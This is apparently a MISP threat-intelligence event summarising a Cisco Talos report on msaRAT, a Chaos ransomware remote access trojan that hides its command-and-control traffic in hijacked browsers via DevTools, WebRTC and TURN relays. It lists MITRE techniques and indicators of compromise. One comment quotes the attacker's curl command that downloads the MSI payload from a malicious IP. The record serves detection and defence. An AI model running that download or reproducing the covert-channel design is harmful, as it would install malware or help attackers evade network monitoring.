{
  "Event": {
    "analysis": "1",
    "date": "2026-07-23",
    "extends_uuid": "",
    "info": "[Threat Intel] Chaos ransomware's msaRAT: Living off the browser to build a covert C2 channel",
    "protected": false,
    "publish_timestamp": "1785586401",
    "published": true,
    "threat_level_id": "2",
    "timestamp": "1785586401",
    "uuid": "e8f6a6f4-27b2-4ea5-bf94-0c4a1b5c8f89",
    "Orgc": {
      "name": "Rectifyq",
      "uuid": "cd9bd516-61fa-476b-980f-2f8de03992d4"
    },
    "Tag": [
      {
        "colour": "#7c6ad9",
        "local": false,
        "name": "misp-galaxy:producer=\"Cisco Talos Intelligence Group\"",
        "relationship_type": ""
      },
      {
        "colour": "#ffffff",
        "local": false,
        "name": "tlp:clear",
        "relationship_type": ""
      },
      {
        "colour": "#004646",
        "local": false,
        "name": "type:OSINT",
        "relationship_type": ""
      },
      {
        "colour": "#b94b1d",
        "local": false,
        "name": "rectifyq:mitre-att&ck=\"none-from-src\"",
        "relationship_type": ""
      },
      {
        "colour": "#b94b1d",
        "local": false,
        "name": "rectifyq:mitre-att&ck=\"from-OTX\"",
        "relationship_type": ""
      },
      {
        "colour": "#d3f567",
        "local": false,
        "name": "misp-galaxy:mitre-attack-pattern=\"JavaScript - T1059.007\"",
        "relationship_type": ""
      },
      {
        "colour": "#7da4ad",
        "local": false,
        "name": "misp-galaxy:mitre-attack-pattern=\"Match Legitimate Resource Name or Location - T1036.005\"",
        "relationship_type": ""
      },
      {
        "colour": "#56c932",
        "local": false,
        "name": "misp-galaxy:mitre-attack-pattern=\"Symmetric Cryptography - T1573.001\"",
        "relationship_type": ""
      },
      {
        "colour": "#7d7034",
        "local": false,
        "name": "misp-galaxy:mitre-attack-pattern=\"System Information Discovery - T1082\"",
        "relationship_type": ""
      },
      {
        "colour": "#7eb739",
        "local": false,
        "name": "misp-galaxy:mitre-attack-pattern=\"Msiexec - T1218.007\"",
        "relationship_type": ""
      },
      {
        "colour": "#f5a258",
        "local": false,
        "name": "misp-galaxy:mitre-attack-pattern=\"Native API - T1106\"",
        "relationship_type": ""
      },
      {
        "colour": "#a92e1c",
        "local": false,
        "name": "misp-galaxy:mitre-attack-pattern=\"Deobfuscate/Decode Files or Information - T1140\"",
        "relationship_type": ""
      },
      {
        "colour": "#e00500",
        "local": false,
        "name": "misp-galaxy:mitre-attack-pattern=\"Remote Access Tools - T1219\"",
        "relationship_type": ""
      },
      {
        "colour": "#43c8db",
        "local": false,
        "name": "misp-galaxy:mitre-attack-pattern=\"Process Injection - T1055\"",
        "relationship_type": ""
      },
      {
        "colour": "#c8f8ef",
        "local": false,
        "name": "misp-galaxy:mitre-attack-pattern=\"System Binary Proxy Execution - T1218\"",
        "relationship_type": ""
      },
      {
        "colour": "#bf01b7",
        "local": false,
        "name": "misp-galaxy:mitre-attack-pattern=\"Modify Registry - T1112\"",
        "relationship_type": ""
      },
      {
        "colour": "#20f80d",
        "local": false,
        "name": "misp-galaxy:mitre-attack-pattern=\"Command and Scripting Interpreter - T1059\"",
        "relationship_type": ""
      },
      {
        "colour": "#1cbe6b",
        "local": false,
        "name": "misp-galaxy:mitre-attack-pattern=\"Virtualization/Sandbox Evasion - T1497\"",
        "relationship_type": ""
      },
      {
        "colour": "#9e0269",
        "local": false,
        "name": "misp-galaxy:mitre-attack-pattern=\"Web Service - T1102\"",
        "relationship_type": ""
      },
      {
        "colour": "#a9f8b1",
        "local": false,
        "name": "misp-galaxy:mitre-attack-pattern=\"Exfiltration Over C2 Channel - T1041\"",
        "relationship_type": ""
      },
      {
        "colour": "#e08bb2",
        "local": false,
        "name": "misp-galaxy:mitre-attack-pattern=\"Obfuscated Files or Information - T1027\"",
        "relationship_type": ""
      },
      {
        "colour": "#d82db7",
        "local": false,
        "name": "misp-galaxy:mitre-attack-pattern=\"Query Registry - T1012\"",
        "relationship_type": ""
      },
      {
        "colour": "#92e858",
        "local": false,
        "name": "misp-galaxy:mitre-attack-pattern=\"Web Protocols - T1071.001\"",
        "relationship_type": ""
      },
      {
        "colour": "#4c0fbb",
        "local": false,
        "name": "misp-galaxy:mitre-attack-pattern=\"Ingress Tool Transfer - T1105\"",
        "relationship_type": ""
      },
      {
        "colour": "#c295b4",
        "local": false,
        "name": "misp-galaxy:mitre-attack-pattern=\"Internal Proxy - T1090.001\"",
        "relationship_type": ""
      },
      {
        "colour": "#49a260",
        "local": false,
        "name": "rectifyq:category=\"threat\"",
        "relationship_type": ""
      },
      {
        "colour": "#10003d",
        "local": false,
        "name": "rectifyq:sub-category=\"TA-profile\"",
        "relationship_type": ""
      },
      {
        "colour": "#110041",
        "local": false,
        "name": "rectifyq:sub-category=\"malware-analysis\"",
        "relationship_type": ""
      },
      {
        "colour": "#f1dfed",
        "local": false,
        "name": "rectifyq:TA-category=\"Ransomware\"",
        "relationship_type": ""
      },
      {
        "colour": "#ffd12e",
        "local": false,
        "name": "rectifyq:target=\"broad-based\"",
        "relationship_type": ""
      },
      {
        "colour": "#55acee",
        "local": false,
        "name": "rectifyq:MY-relevancy=\"potentially-relevant\"",
        "relationship_type": ""
      },
      {
        "colour": "#0088cc",
        "local": false,
        "name": "misp-galaxy:ransomware=\"Chaos\"",
        "relationship_type": ""
      },
      {
        "colour": "#0088cc",
        "local": false,
        "name": "misp-galaxy:software-vendor=\"webrtc\"",
        "relationship_type": ""
      },
      {
        "colour": "#626567",
        "local": false,
        "name": "rectifyq:no-samples-in=\"MalwareBazaar\"",
        "relationship_type": ""
      },
      {
        "colour": "#626567",
        "local": false,
        "name": "rectifyq:no-samples-in=\"Tria.ge\"",
        "relationship_type": ""
      },
      {
        "colour": "#3800d9",
        "local": false,
        "name": "rectifyq:action-taken=\"VT-comment\"",
        "relationship_type": ""
      },
      {
        "colour": "#3d00e9",
        "local": false,
        "name": "rectifyq:action-taken=\"telegram\"",
        "relationship_type": ""
      }
    ],
    "Attribute": [
      {
        "category": "External analysis",
        "comment": "",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1784862046",
        "to_ids": false,
        "type": "link",
        "uuid": "f17ee897-532e-41d6-af77-1d7ab4480120",
        "value": "https://blog.talosintelligence.com/chaos-msarat-living-off-the-browser-to-build-covert-c2-channel/"
      },
      {
        "category": "Other",
        "comment": "Description",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1784862046",
        "to_ids": false,
        "type": "text",
        "uuid": "899593c7-d5d0-441e-9a46-4fff82c682e8",
        "value": "Cisco Talos discovered msaRAT, a new Rust-based remote access trojan attributed to the Chaos ransomware group. This sophisticated RAT never directly touches the network, instead controlling command-and-control communications exclusively through Chrome DevTools Protocol (CDP). It manipulates browsers via CDP, performs signaling with Cloudflare Workers, and establishes WebRTC DataChannels using Twilio TURN as a relay. The infection chain begins with downloading an MSI file containing the RAT payload. msaRAT hijacks Chrome or Edge browsers in headless mode, injects JavaScript code, and establishes encrypted C2 communications through WebRTC. This design makes all external communications appear to originate from legitimate browser processes, effectively hiding C2 traffic within normal web activity and evading detection by firewalls and network monitoring tools."
      },
      {
        "category": "Other",
        "comment": "Summary",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1784862046",
        "to_ids": false,
        "type": "text",
        "uuid": "ba3f2dbb-8fa2-42ea-898c-52ffdcdc2c0a",
        "value": "Name: Chaos ransomware's msaRAT: Living off the browser to build a covert C2 channel\nAuthor: AlienVault\nAdversary: Chaos\nTags: [\"browser hijacking\", \"webrtc\", \"twilio turn\", \"msarat\", \"cloudflare workers\", \"ransomware-as-a-service\", \"rust-based rat\", \"covert tunneling\", \"chrome devtools protocol\"]\nTgtd countries: []\nMlwr families: [\"msaRAT\"]\nAttack_ids: [\"T1059.007\", \"T1036.005\", \"T1573.001\", \"T1082\", \"T1218.007\", \"T1106\", \"T1140\", \"T1219\", \"T1055\", \"T1218\", \"T1112\", \"T1059\", \"T1497\", \"T1102\", \"T1041\", \"T1027\", \"T1012\", \"T1071.001\", \"T1105\", \"T1090.001\"]\nIndustries: []"
      },
      {
        "category": "Attribution",
        "comment": "Adversary",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1784862046",
        "to_ids": false,
        "type": "threat-actor",
        "uuid": "eb7ab6b7-2596-43ac-ad92-de88a040f2b0",
        "value": "Chaos"
      },
      {
        "category": "Network activity",
        "comment": "",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1785580526",
        "to_ids": true,
        "type": "url",
        "uuid": "9e8e9876-341d-4bc8-b33e-61c3a7d73f42",
        "value": "http://172.86.126.18:443/update_ms.msi",
        "Tag": [
          {
            "colour": "#342294",
            "local": false,
            "name": "CommentAdded",
            "relationship_type": ""
          }
        ]
      },
      {
        "category": "Network activity",
        "comment": "",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1785580547",
        "to_ids": true,
        "type": "hostname",
        "uuid": "4abd7e5e-7902-4c21-9c3d-ee2b443a870c",
        "value": "is-01-ast.ols-img-12.workers.dev",
        "Tag": [
          {
            "colour": "#342294",
            "local": false,
            "name": "CommentAdded",
            "relationship_type": ""
          }
        ]
      },
      {
        "category": "Network activity",
        "comment": "\"...ic will pass through undetected. curl.exe http://172.86.126.18:443/update_ms.msi -o C:\\programdata\\update_ms.msi...\"",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1785580568",
        "to_ids": true,
        "type": "ip-dst",
        "uuid": "e617cc43-c77c-43c9-9008-31bc68b6f669",
        "value": "172.86.126.18",
        "Tag": [
          {
            "colour": "#652a80",
            "local": false,
            "name": "asn:asn=\"14956\"",
            "relationship_type": ""
          },
          {
            "colour": "#9f7512",
            "local": false,
            "name": "asn:as-owner=\"ROUTERHOSTING\"",
            "relationship_type": ""
          },
          {
            "colour": "#d16c37",
            "local": false,
            "name": "asn:as-country=\"US\"",
            "relationship_type": ""
          },
          {
            "colour": "#0088cc",
            "local": false,
            "name": "misp-galaxy:country=\"united states of america\"",
            "relationship_type": ""
          },
          {
            "colour": "#342294",
            "local": false,
            "name": "CommentAdded",
            "relationship_type": ""
          }
        ]
      },
      {
        "category": "Network activity",
        "comment": "\"...g STUN/TURN server information. The STUN server (\u201cstun2.l.google.com\u201d) is used to discover the external IP address of...\"",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1785580589",
        "to_ids": true,
        "type": "domain",
        "uuid": "e490e066-c1fa-40d0-962f-e2b72f1f1762",
        "value": "stun2.l.google.com",
        "Tag": [
          {
            "colour": "#2c2142",
            "local": false,
            "name": "false-positive:risk=\"high\"",
            "relationship_type": ""
          },
          {
            "colour": "#342294",
            "local": false,
            "name": "CommentAdded",
            "relationship_type": ""
          }
        ]
      },
      {
        "category": "Network activity",
        "comment": "\"...in order to traverse NAT, while the TURN server (\u201cglobal.turn.twilio.com\u201d) acts as a relay point when a direct Peer-to-Pee...\"",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1785580610",
        "to_ids": true,
        "type": "domain",
        "uuid": "b682582a-5e20-4876-a7cf-e2c7d7ed92e5",
        "value": "global.turn.twilio.com",
        "Tag": [
          {
            "colour": "#342294",
            "local": false,
            "name": "CommentAdded",
            "relationship_type": ""
          }
        ]
      }
    ]
  }
}